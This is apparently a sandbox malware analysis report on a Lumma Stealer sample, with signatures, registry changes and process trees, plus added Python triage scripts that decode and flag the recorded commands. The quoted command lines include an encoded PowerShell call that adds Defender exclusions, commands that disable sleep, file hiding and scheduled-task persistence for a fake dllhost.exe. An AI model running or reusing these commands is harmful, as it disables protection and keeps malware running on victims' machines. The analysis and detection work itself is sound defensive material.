Malware Analysis Report

2024-11-15 06:26

Sample ID: 240705-tl4statenh
Target: [email protected]
SHA256: 7da7d152162fd0a796b93b2f28715c50b577ac71a1107b668dc6b2834a5602ba
Tags: lumma discovery execution persistence privilege_escalation spyware stealer
Score: 10/10


Analysis Overview

Score: 10/10

SHA256: 7da7d152162fd0a796b93b2f28715c50b577ac71a1107b668dc6b2834a5602ba

Threat Level: Known bad

The file [email protected] was found to be: Known bad.

Malicious Activity Summary

Tags: lumma discovery execution persistence privilege_escalation spyware stealer

Lumma Stealer

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Event Triggered Execution: Component Object Model Hijacking

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Power Settings

Suspicious use of SetThreadContext

Drops file in Program Files directory

Command and Scripting Interpreter: PowerShell

Unsigned PE

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Modifies data under HKEY_USERS

Views/modifies file attributes

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Opens file in notepad (likely ransom note)

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported: 2024-07-05 16:10

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-07-05 16:09

Reported: 2024-07-05 16:15

Platform: win10-20240404-en

Max time kernel: 210s

Max time network: 211s

Command Line

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

Signatures

Lumma Stealer

Tags: stealer lumma

Downloads MZ/PE file

Event Triggered Execution: Component Object Model Hijacking

Tags: persistence privilege_escalation

Accesses cryptocurrency files/wallets, possible credential harvesting

Tags: spyware

Checks installed software on the system

Tags: discovery

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | raw.githubusercontent.com | N/A | N/A
N/A | pastebin.com | N/A | N/A

Power Settings

Tags: persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4180 set thread context of 5104 | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\7-Zip\Lang\tk.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\uz-cyrl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ext.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\fi.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\gu.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ps.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\es.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\et.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\id.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\mr.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\sr-spc.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\sr-spl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\bg.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ga.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\it.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\nl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\sq.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ar.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\tt.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\sl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\7zFM.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\da.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\mng2.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\zh-cn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\7z.dll | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\br.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\pt.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\yo.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\is.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\kaa.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\cs.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\hi.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ne.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\History.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ko.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\tg.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\zh-tw.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\af.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\cy.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\fy.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\io.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ba.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\bn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\fa.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\readme.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\7-zip.chm | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\an.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\co.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\he.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\az.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\be.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\sa.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ro.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\sw.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\7-zip.dll | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ca.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\el.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\eu.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ms.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
File opened for modification | C:\Program Files\7-Zip\7-zip32.dll | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A

Command and Scripting Interpreter: PowerShell

Tags: execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133646696155449468" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A

Scheduled Task/Job: Scheduled Task

Tags: persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4180 wrote to memory of 5104 | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 5104 wrote to memory of 3656 | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe
PID 3656 wrote to memory of 212 | N/A | C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe | C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 4808 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\mode.com
PID 212 wrote to memory of 4796 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 4272 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 3740 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 3316 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 812 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 1928 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 1840 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 752 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe
PID 212 wrote to memory of 868 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 868 wrote to memory of 4228 | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | C:\Windows\SysWOW64\cmd.exe
PID 4228 wrote to memory of 1192 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 4320 | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | C:\Windows\SysWOW64\cmd.exe
PID 868 wrote to memory of 3468 | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | C:\Windows\SysWOW64\cmd.exe
PID 4320 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 3468 wrote to memory of 1880 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 4332 wrote to memory of 2540 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe

"C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p1404753551733818025492326517 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA=="
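The -EncodedCommand argument on the powershell.exe line above is Base64 over UTF-16LE text, with <# ... #> block comments inserted between the tokens as padding. Decoded, it reads Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which excludes the whole user profile and the system drive from Microsoft Defender scanning before the scheduled-task persistence that follows. The decoder below is an added example for triaging such lines; it is not part of this report or of the sample. The regex covering the documented -e/-ec/-enc short forms and the list of MpPreference switches it flags are my own simplifications.

```python
import base64
import re
from typing import Optional

# Command line as recorded in the report's process list (copied from the page).
CMDLINE = 'powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA=="'

# -EncodedCommand and its documented short forms (-e, -ec, -enc); the value may be quoted or bare.
_ENC_ARG = re.compile(r'-(?:e|ec|enc|encodedcommand)\s+["\']?([A-Za-z0-9+/=]{8,})', re.IGNORECASE)
# PowerShell block comments, used in this sample purely as junk padding between tokens.
_BLOCK_COMMENT = re.compile(r'<#.*?#>', re.DOTALL)
# Defender tampering through the MpPreference cmdlets: exclusions or any Disable* switch
# (illustrative list, not exhaustive).
_DEFENDER_TAMPER = re.compile(
    r'\b(?:Add|Set)-MpPreference\b.*?-(?:Exclusion(?:Path|Process|Extension)|Disable\w+)',
    re.IGNORECASE | re.DOTALL,
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script carried by -EncodedCommand, or None if the line has none."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def normalize(script: str) -> str:
    """Strip <# ... #> block comments and collapse whitespace so the real command stands out."""
    return re.sub(r'\s+', ' ', _BLOCK_COMMENT.sub(' ', script)).strip()


def triage(cmdline: str) -> dict:
    """Decode, normalize and flag a PowerShell command line from a process log."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return {'encoded': False, 'decoded': None, 'normalized': None, 'defender_tamper': False}
    norm = normalize(decoded)
    return {
        'encoded': True,
        'decoded': decoded,
        'normalized': norm,
        'defender_tamper': bool(_DEFENDER_TAMPER.search(norm)),
    }


if __name__ == '__main__':
    result = triage(CMDLINE)
    print(result['decoded'])
    print(result['normalized'])
    print('Defender exclusion / tamper:', result['defender_tamper'])
```

The same regex handles the parent cmd.exe line above, where the encoded call is chained with the powercfg commands that disable standby and hibernation; only the first -EncodedCommand value is decoded.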

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"
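The two schtasks.exe lines register the sample's persistence: a task named dllhost that re-runs C:\ProgramData\Dllhost\dllhost.exe every 5 minutes, and an hourly task under a NvStray\ folder name that points at the same binary. Both the task name and the file name borrow dllhost.exe, the COM Surrogate that legitimately lives in System32, and the copy sits in ProgramData, which any local user can write to. The parser below is an added example, not part of the report: it pulls the fields out of such command lines and lists the reasons a task looks like malware persistence. The writable-directory prefixes and the lookalike name list are assumptions to tune locally.

```python
import ntpath
import re
from typing import Dict, List, Optional

# schtasks.exe command lines as recorded in the report's process list (copied from the page).
SCHTASKS_LINES = [
    r'SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"',
    r'SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"',
]

_CREATE = re.compile(r'\bschtasks(?:\.exe)?\b.*?/create\b', re.IGNORECASE)
# /TN task name, /TR action, /SC schedule, /MO modifier; values are quoted or a single bare token.
_SWITCH = re.compile(r'/(TN|TR|SC|MO)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)

# Locations a standard user can write to (assumed list): persistence that runs from here deserves a look.
USER_WRITABLE_PREFIXES = ('c:\\programdata\\', 'c:\\users\\', '%programdata%', '%appdata%',
                          '%localappdata%', '%temp%')
SYSTEM_DIRS = ('c:\\windows\\system32\\', 'c:\\windows\\syswow64\\')
# Windows binary names commonly borrowed for masquerading (short illustrative list, an assumption).
LOOKALIKE_NAMES = {'dllhost.exe', 'svchost.exe', 'rundll32.exe', 'conhost.exe', 'explorer.exe'}


def parse_schtasks(line: str) -> Optional[Dict[str, object]]:
    """Parse a 'schtasks /create' command line into its interesting fields; None for other lines."""
    if not _CREATE.search(line):
        return None
    fields = {k.upper(): (quoted or bare) for k, quoted, bare in _SWITCH.findall(line)}
    action = fields.get('TR', '')
    # The executable is the first token, unless the action itself starts with a quoted path.
    exe = action[1:].split('"', 1)[0] if action.startswith('"') else action.split(' ', 1)[0]
    mo = fields.get('MO', '')
    return {
        'name': fields.get('TN', ''),
        'schedule': fields.get('SC', '').upper(),
        'modifier': int(mo) if mo.isdigit() else None,
        'action': action,
        'exe': exe,
    }


def assess(task: Dict[str, object]) -> List[str]:
    """Reasons a parsed task looks like malware persistence rather than an ordinary job."""
    exe = str(task['exe']).lower()
    reasons = []
    if exe.startswith(USER_WRITABLE_PREFIXES):
        reasons.append('action runs from a user-writable directory: ' + exe)
    if ntpath.basename(exe) in LOOKALIKE_NAMES and not exe.startswith(SYSTEM_DIRS):
        reasons.append('binary name mimics a Windows system executable but is outside System32')
    if task['schedule'] == 'MINUTE' and (task['modifier'] or 1) <= 5:
        reasons.append('re-launches every %d minute(s)' % (task['modifier'] or 1))
    return reasons


if __name__ == '__main__':
    for line in SCHTASKS_LINES:
        task = parse_schtasks(line)
        print(task['name'], task['schedule'], task['modifier'], task['exe'])
        for reason in assess(task):
            print('  -', reason)
```

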